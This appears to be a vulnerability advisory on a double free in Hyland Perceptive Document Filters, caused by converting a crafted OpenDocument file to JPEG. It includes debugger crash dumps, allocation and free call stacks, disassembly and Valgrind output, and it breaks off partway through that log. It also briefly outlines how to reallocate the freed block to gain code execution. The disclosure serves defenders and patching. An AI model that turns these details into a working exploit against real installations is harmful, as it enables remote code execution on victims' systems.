A crafted OpenDocument document can lead to a SkCanvas object double free resulting in direct code execution.\n\n### Tested Versions\n\nPerceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux\n\n### Product URLs\n\n<https://www.hyland.com/en/perceptive#docfilters>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-415: Double Free\n\n### Details\n \n \n This vulnerability is present in the Hyland Document filter conversion which is used for big data, eDiscovery, DLP, email archival, content management, business intelligence and intelligent capture services. \n \n\nIt can convert common formats such as Microsoft's document formats into more usable and easily viewed formats. There is a vulnerability in the conversion process of an OpenDocument document to JPEG. A specially crafted OpenDocument file can lead to a SkCanvas object double free and remote code execution. Let\u2019s investigate this vulnerability. After we attempt to convert a malicious OpenDocument using the Hyland library we see the following state:\n \n \n //page heap is turned on +hpa\n windbg.exe isys_doc2text.exe --jpg malicious_opendocument\n \n (4c0.1e70): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=00f5e788 ebx=00000000 ecx=10f06f00 edx=02000000 esi=1056ef98 edi=10570ff0\n eip=6235cfd1 esp=00f5e770 ebp=00f5e794 iopl=0 nv up ei pl nz na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206\n ISYSreadershd!IGR_ImageExport+0xe7f71:\n 6235cfd1 8b01 mov eax,dword ptr [ecx] ds:002b:10f06f00=????????\n \n\nShowing more context\n \n \n 0:000> u eip-5\n ISYSreadershd!IGR_ImageExport+0xe7f6c:\n 6235cfcc 0c85 or al,85h\n 6235cfce c9 leave\n 6235cfcf 7406 je ISYSreadershd!IGR_ImageExport+0xe7f77 (6235cfd7)\n 6235cfd1 8b01 mov eax,dword ptr [ecx]\n 6235cfd3 6a01 push 1\n 6235cfd5 ff10 call dword ptr [eax]\n 6235cfd7 8b7e08 
mov edi,dword ptr [esi+8]\n 6235cfda 85ff test edi,edi\n \n\nWe see an obvious attempt at a virtual function call on a previously freed object. Further examination confirms our assumptions:\n \n \n 0:000> !heap -p -a ecx\n address 10f06f00 found in\n _DPH_HEAP_ROOT @ 78f1000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 12da9af8: 10f06000 2000\n 6329ab22 verifier!AVrfDebugPageHeapFree+0x000000c2\n 77045918 ntdll!RtlDebugFreeHeap+0x0000003c\n 76ff5be1 ntdll!RtlpFreeHeap+0x00056161\n 76f9fa0d ntdll!RtlFreeHeap+0x000007cd\n 62676591 ISYSreadershd!IGR_ImageExport+0x00401531\n 62640792 ISYSreadershd!IGR_ImageExport+0x003cb732\n 623d973c ISYSreadershd!IGR_ImageExport+0x001646dc\n 61e0eb4c ISYSreadershd+0x0003eb4c\n 622a628e ISYSreadershd!IGR_ImageExport+0x0003122e\n 622a5ed3 ISYSreadershd!IGR_ImageExport+0x00030e73\n 6233d6c4 ISYSreadershd!IGR_ImageExport+0x000c8664\n 622ac13f ISYSreadershd!IGR_ImageExport+0x000370df\n 622ac3c0 ISYSreadershd!IGR_ImageExport+0x00037360\n 622acb3b ISYSreadershd!IGR_ImageExport+0x00037adb\n 622abe79 ISYSreadershd!IGR_ImageExport+0x00036e19\n 622673e4 ISYSreadershd!ISYS_GetHeapHandle+0x000ea7e4\n 62d441fa isysreaders+0x001d41fa\n 631cef8f ISYS11df!IGR_Render_Page+0x0000005f\n 0037a2c8 isys_doc2text+0x0002a2c8\n 003771fb isys_doc2text+0x000271fb\n 0037612f isys_doc2text+0x0002612f\n 003a4c52 isys_doc2text+0x00054c52\n 003a2cc5 isys_doc2text+0x00052cc5\n 0037cf76 isys_doc2text+0x0002cf76\n 00457f44 isys_doc2text+0x00107f44\n 751c8654 KERNEL32!BaseThreadInitThunk+0x00000024\n 76fc4a77 ntdll!__RtlUserThreadStart+0x0000002f\n 76fc4a47 ntdll!_RtlUserThreadStart+0x0000001b\n \n\nChecking the Linux version, we can obtain a bit more information thanks to partial symbols:\n \n \n image base :\n 0xf4a9b000 0xf54c5000 r-xp /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so\n \n [----------------------------------registers-----------------------------------]\n EAX: 0xf5c45968 --> 0xf5c45960 --> 0xf5c45958 --> 
0x8a0f000 --> 0x0 \n EBX: 0xf54dff0c --> 0xa42fcc \n ECX: 0x8a17e1c --> 0x0 \n EDX: 0x8a17c08 --> 0xf5c45968 --> 0xf5c45960 --> 0xf5c45958 --> 0x8a0f000 --> 0x0 \n ESI: 0x8a17e18 --> 0xf54da798 --> 0xf51e89d0 --> 0x83e58955 \n EDI: 0x8a16300 --> 0xf54da780 --> 0xf51f0770 --> 0x57e58955 \n EBP: 0xffa1e4a8 --> 0xffa1e4c8 --> 0xffa1e4e8 --> 0xffa1e508 --> 0xffa1e528 --> 0xffa1e578 (--> ...)\n ESP: 0xffa1e480 --> 0x8a17c08 --> 0xf5c45968 --> 0xf5c45960 --> 0xf5c45958 --> 0x8a0f000 (--> ...)\n EIP: 0xf51f06c0 --> 0x830450ff\n EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0xf51f06ba: sub esp,0xc\n 0xf51f06bd: mov eax,DWORD PTR [edx]\n 0xf51f06bf: push edx\n => 0xf51f06c0: call DWORD PTR [eax+0x4]\n 0xf51f06c3: add esp,0x10\n 0xf51f06c6: mov esi,DWORD PTR [edi+0x4]\n 0xf51f06c9: test esi,esi\n 0xf51f06cb: je 0xf51f06e1\n Guessed arguments:\n arg[0]: 0x8a17c08 --> 0xf5c45968 --> 0xf5c45960 --> 0xf5c45958 --> 0x8a0f000 --> 0x0 \n \n \n \n //Double Free call stack\n #0 0xf51f06bf in ISYS_NS::CGdiCanvasImpl::~CGdiCanvasImpl () from ./libISYSreadershd.so\n #1 0xf51e89e9 in ?? () from ./libISYSreadershd.so\n #2 0xf4b4b028 in ?? () from ./libISYSreadershd.so\n #3 0xf51d9b1f in ISYS_NS::CGdiCanvas::~CGdiCanvas() () from ./libISYSreadershd.so\n #4 0xf51e8829 in ?? () from ./libISYSreadershd.so\n #5 0xf51f01e8 in ISYS_NS::CGdiBitmapImpl::~CGdiBitmapImpl() () from ./libISYSreadershd.so\n #6 0xf51e88e9 in ?? () from ./libISYSreadershd.so\n #7 0xf51db388 in ?? ISYS_NS::CGdiBitmap::~CGdiBitmap() from ./libISYSreadershd.so\n #8 0xf5227233 in ?? () from ./libISYSreadershd.so\n #9 0xf50b3221 in ?? () from ./libISYSreadershd.so\n #10 0xf522172d in ?? () from ./libISYSreadershd.so\n #11 0xf51a621f in ?? () from ./libISYSreadershd.so\n #12 0xf518a8bd in ?? () from ./libISYSreadershd.so\n #13 0xf591c6c3 in ?? 
() from ./libISYSreaders.so\n #14 0xf7ef4c28 in IGR_Close_Canvas () from ./libISYS11df.so\n #15 0x0805bda0 in ?? ()\n #16 0x08061690 in ?? ()\n #17 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #18 0xf613173d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #19 0xf613dff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #20 0xf613a524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #21 0x08054e88 in ?? ()\n #22 0xf5aab637 in __libc_start_main (main=0x8054d40, argc=0x5, argv=0xffa201e4, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f3d880 <_dl_fini>, stack_end=0xffa201dc) at ../csu/libc-start.c:291\n #23 0x080531b1 in ?? ()\n \n\nTracking this object\u2019s life cycle, we can see its creation inside the `ISYS_NS::CGdiCanvasImpl::CGdiCanvasImpl` constructor:\n \n \n Object allocation call stack\n \n #0 0xf51f0977 in ISYS_NS::CGdiCanvasImpl () from ./libISYSreadershd.so\n #1 0xf51e65d0 in ?? () from ./libISYSreadershd.so\n #2 0xf5229bf4 in ?? () from ./libISYSreadershd.so\n #3 0xf50b9f46 in ?? () from ./libISYSreadershd.so\n #4 0xf50b3539 in ?? () from ./libISYSreadershd.so\n #5 0xf5196e5d in ?? () from ./libISYSreadershd.so\n #6 0xf591c595 in ?? () from ./libISYSreaders.so\n #7 0xf7ef4bda in IGR_Render_Page () from ./libISYS11df.so\n #8 0x0805bbd8 in ?? ()\n #9 0x08061690 in ?? ()\n #10 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #11 0xf613173d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #12 0xf613dff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #13 0xf613a524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #14 0x08054e88 in ?? 
()\n #15 0xf5aab637 in __libc_start_main (main=0x8054d40, argc=0x5, argv=0xffa201e4, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f3d880 <_dl_fini>, stack_end=0xffa201dc) at ../csu/libc-start.c:291\n #16 0x080531b1 in ?? ()\n \n \n \n .text:F51F095C push 0FCh ; unsigned int\n .text:F51F0961 call operator new(uint)\n .text:F51F0966 mov esi, eax\n .text:F51F0968 pop ecx\n .text:F51F0969 pop eax\n .text:F51F096A push edi ; SkBitmap *\n .text:F51F096B push esi ; this\n .text:F51F096C call SkCanvas::SkCanvas(SkBitmap const&)\n .text:F51F0971 add esp, 10h\n .text:F51F0974 mov edx, [ebp+arg_0]\n .text:F51F0977 mov [edx+8], esi\n \n\nFurther on, inside the `sub_F511F5F0` function, we can observe a call at address `F511FCE3` to the `SkCanvas::~SkCanvas` virtual destructor, which deallocates the vulnerable object:\n \n \n sub_F511F5F0\n (...)\n .text:F511FCD7 sub esp, 0Ch\n .text:F511FCDA mov edx, [ebp+var_164]\n .text:F511FCE0 mov eax, [edx]\n .text:F511FCE2 push edx\n .text:F511FCE3 call dword ptr [eax+4] ; SkCanvas::~SkCanvas\n .text:F511FCE6 add esp, 10h\n \n \n Call stack for deallocation\n \n #0 0xf46f6bed in SkCanvas::~SkCanvas() () from ./libISYSgraphics.so\n #1 0xf511fce6 in ?? () from ./libISYSreadershd.so\n #2 0xf5083569 in ?? () from ./libISYSreadershd.so\n #3 0xf50832e4 in ?? () from ./libISYSreadershd.so\n #4 0xf508331d in ?? () from ./libISYSreadershd.so\n #5 0xf50833bb in ?? () from ./libISYSreadershd.so\n #6 0xf5224987 in ?? () from ./libISYSreadershd.so\n #7 0xf50b4af7 in ?? () from ./libISYSreadershd.so\n #8 0xf50b4cdd in ?? () from ./libISYSreadershd.so\n #9 0xf50ba2d1 in ?? () from ./libISYSreadershd.so\n #10 0xf50b3539 in ?? () from ./libISYSreadershd.so\n #11 0xf5196e5d in ?? () from ./libISYSreadershd.so\n #12 0xf591c595 in ?? () from ./libISYSreaders.so\n #13 0xf7ef4bda in IGR_Render_Page () from ./libISYS11df.so\n #14 0x0805bbd8 in ?? ()\n #15 0x08061690 in ?? 
()\n #16 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #17 0xf613173d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #18 0xf613dff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #19 0xf613a524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #20 0x08054e88 in ?? ()\n #21 0xf5aab637 in __libc_start_main (main=0x8054d40, argc=0x5, argv=0xffa201e4, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f3d880 <_dl_fini>, stack_end=0xffa201dc) at ../csu/libc-start.c:291\n #22 0x080531b1 in ?? ()\n \n\nNext, during destruction of the `ISYS_NS::CGdiCanvasImpl` object, its destructor `ISYS_NS::CGdiCanvasImpl::~CGdiCanvasImpl` calls the `SkCanvas::~SkCanvas` virtual destructor a second time on the same, already freed object:\n \n \n .text:F51F0690 ISYS_NS::CGdiCanvasImpl::~CGdiCanvasImpl() proc near\n .text:F51F0690 \n (...)\n .text:F51F06BA sub esp, 0Ch\n .text:F51F06BD mov eax, [edx]\n .text:F51F06BF push edx\n .text:F51F06C0 call dword ptr [eax+4] ; SkCanvas::~SkCanvas()\n .text:F51F06C3 add esp, 10h\n \n \n Call stack for second free\n #0 0xf51f06c0 in ?? () from ./libISYSreadershd.so\n #1 0xf51e89e9 in ?? () from ./libISYSreadershd.so\n #2 0xf4b4b028 in ?? () from ./libISYSreadershd.so\n #3 0xf51d9b1f in ?? () from ./libISYSreadershd.so\n #4 0xf51e8829 in ?? () from ./libISYSreadershd.so\n #5 0xf51f01e8 in ?? () from ./libISYSreadershd.so\n #6 0xf51e88e9 in ?? () from ./libISYSreadershd.so\n #7 0xf51db388 in ?? () from ./libISYSreadershd.so\n #8 0xf5227233 in ?? () from ./libISYSreadershd.so\n #9 0xf50b3221 in ?? () from ./libISYSreadershd.so\n #10 0xf522172d in ?? () from ./libISYSreadershd.so\n #11 0xf51a621f in ?? () from ./libISYSreadershd.so\n #12 0xf518a8bd in ?? () from ./libISYSreadershd.so\n #13 0xf591c6c3 in ?? () from ./libISYSreaders.so\n #14 0xf7ef4c28 in IGR_Close_Canvas () from ./libISYS11df.so\n #15 0x0805bda0 in ?? ()\n #16 0x08061690 in ?? 
()\n #17 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #18 0xf613173d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #19 0xf613dff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #20 0xf613a524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #21 0x08054e88 in ?? ()\n #22 0xf5aab637 in __libc_start_main (main=0x8054d40, argc=0x5, argv=0xffa201e4, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f3d880 <_dl_fini>, stack_end=0xffa201dc) at ../csu/libc-start.c:291\n #23 0x080531b1 in ?? () \n \n\nresulting in the double free of the `SkCanvas` object. Note that the first deallocation happens under `IGR_Render_Page` and the second under `IGR_Close_Canvas`, so the two frees are separated by the remainder of the render operation. An attacker who reallocates the freed 252-byte block with controlled data in that window can turn this double free into arbitrary code execution, since the second destructor call dispatches through the vtable pointer read from the stale object.\n\n### Crash Information\n \n \n ==6702== Command: ./isys_doc2text --jpg -o /tmp ./storage/7afffeb388f9aebf11226b95328be2f7\n ==6702== \n [1] File type: Open Document Format (76); Capabilities: 7 - ./storage/7afffeb388f9aebf11226b95328be2f7\n [00000000] IGR_RENDER_PAGE failed on ./storage/7afffeb388f9aebf11226b95328be2f7 with code 4 [Could not read ZIP file entry]\n ==6702== Invalid read of size 4\n ==6702== at 0x78956BD: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D9E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x71F0027: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x787EB1E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D828: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78951E7: ??? 
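The ownership bug the Details section walks through (a canvas allocated in a constructor, freed by a rendering helper that leaves the stale pointer in place, then freed again by the owner's destructor) reduces to a small C++ pattern. The block below is an added example and is not code from the Talos report or from the Hyland product; `TrackingHeap`, `VulnerableCanvasOwner`, `Canvas` and `FixedCanvasOwner` are illustrative stand-ins. Because a genuine second `delete` is undefined behaviour, the vulnerable flow is modelled against an instrumented heap that counts double frees instead of corrupting allocator metadata, while the hardened owner uses the real `std::unique_ptr` idiom.

```cpp
// Added example, not code from the Talos report or from Hyland: a minimal model
// of the ownership bug described above. All names here are illustrative stand-ins.
#include <cstddef>
#include <memory>
#include <vector>

// Instrumented allocator standing in for the process heap. A second release of
// the same block is counted instead of corrupting allocator metadata, so the
// vulnerable flow can be run safely and checked (a real double delete is UB).
struct TrackingHeap {
    std::vector<bool> live;   // one entry per allocated block
    int double_frees = 0;

    // Plays the role of operator new in CGdiCanvasImpl's constructor.
    std::size_t allocate() { live.push_back(true); return live.size() - 1; }

    // Plays the role of the virtual SkCanvas::~SkCanvas call followed by delete.
    // Returns false when the block was already freed (the double free).
    bool release(std::size_t handle) {
        if (handle >= live.size() || !live[handle]) { ++double_frees; return false; }
        live[handle] = false;
        return true;
    }
};

// Vulnerable owner, mirroring CGdiCanvasImpl: the constructor allocates the canvas
// and stores the raw handle ([this+8] in the report). The rendering helper (the
// role sub_F511F5F0 plays) frees the canvas but leaves the stale handle behind,
// and ~CGdiCanvasImpl frees it a second time.
struct VulnerableCanvasOwner {
    TrackingHeap& heap;
    std::size_t canvas;
    explicit VulnerableCanvasOwner(TrackingHeap& h) : heap(h), canvas(h.allocate()) {}
    void renderPage() { heap.release(canvas); }        // first free; handle not cleared
    ~VulnerableCanvasOwner() { heap.release(canvas); } // second free of the same block
};

// Stand-in for SkCanvas with a virtual destructor; counts destructor runs.
struct Canvas {
    static int destroyed;
    virtual ~Canvas() { ++destroyed; }
};
int Canvas::destroyed = 0;

// Hardened owner: exactly one owning pointer. reset() both destroys the canvas
// and clears the pointer, so the implicit destructor finds nothing left to delete.
struct FixedCanvasOwner {
    std::unique_ptr<Canvas> canvas{new Canvas()};
    void renderPage() { canvas.reset(); }   // idempotent: a second reset() is a no-op
    // implicit ~FixedCanvasOwner: unique_ptr deletes only if still non-null
};

// IGR_Render_Page followed by IGR_Close_Canvas on the vulnerable owner; returns
// how many double frees the instrumented heap observed (1 for the bug).
int runVulnerableFlow() {
    TrackingHeap heap;
    { VulnerableCanvasOwner owner(heap); owner.renderPage(); }
    return heap.double_frees;
}

// Same flow on the hardened owner; returns how many times ~Canvas ran (exactly 1).
int runFixedFlow() {
    Canvas::destroyed = 0;
    { FixedCanvasOwner owner; owner.renderPage(); }
    return Canvas::destroyed;
}
```

The point of the fix is not the smart pointer itself but that release and ownership live in one place: whatever code path destroys the canvas must also invalidate the owner's reference, otherwise the owner's destructor cannot know the object is gone.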
(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D8E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7880387: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CC232: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758220: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78C672C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x784B21E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Address 0x6c69890 is 0 bytes inside a block of size 252 free'd\n ==6702== at 0x402D7B8: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x8D49BF4: SkCanvas::~SkCanvas() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSgraphics.so)\n ==6702== by 0x77C4CE5: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7728568: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77282E3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x772831C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77283BA: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78C9986: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759AF6: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759CDC: ??? 
(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775F2D0: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Block was alloc'd at\n ==6702== at 0x402C6BC: operator new(unsigned int) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x7895965: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788B5CF: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CEBF3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775EF45: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x783BE5C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x67BE594: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreaders.so)\n ==6702== by 0x403CBD9: IGR_Render_Page (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYS11df.so)\n ==6702== by 0x805BBD7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x806168F: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x8068C26: main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== \n ==6702== Invalid write of size 4\n ==6702== at 0x8D2A02F: SkRefCntBase::~SkRefCntBase() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSgraphics.so)\n ==6702== by 0x78956C2: ??? 
(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D9E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x71F0027: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x787EB1E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D828: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78951E7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D8E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7880387: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CC232: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758220: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78C672C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Address 0x6c69890 is 0 bytes inside a block of size 252 free'd\n ==6702== at 0x402D7B8: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x8D49BF4: SkCanvas::~SkCanvas() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSgraphics.so)\n ==6702== by 0x77C4CE5: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7728568: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77282E3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x772831C: ??? 
(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77283BA: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78C9986: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759AF6: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759CDC: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775F2D0: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Block was alloc'd at\n ==6702== at 0x402C6BC: operator new(unsigned int) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x7895965: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788B5CF: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CEBF3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775EF45: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x783BE5C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x67BE594: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreaders.so)\n ==6702== by 0x403CBD9: IGR_Render_Page (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYS11df.so)\n ==6702== by 0x805BBD7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x806168F: ??? 
(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x8068C26: main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== \n ==6702== Invalid free() / delete / delete[] / realloc()\n ==6702== at 0x402D7B8: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x8D2A036: SkRefCntBase::~SkRefCntBase() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSgraphics.so)\n ==6702== by 0x78956C2: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D9E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x71F0027: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x787EB1E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D828: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78951E7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D8E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7880387: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CC232: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758220: ??? 
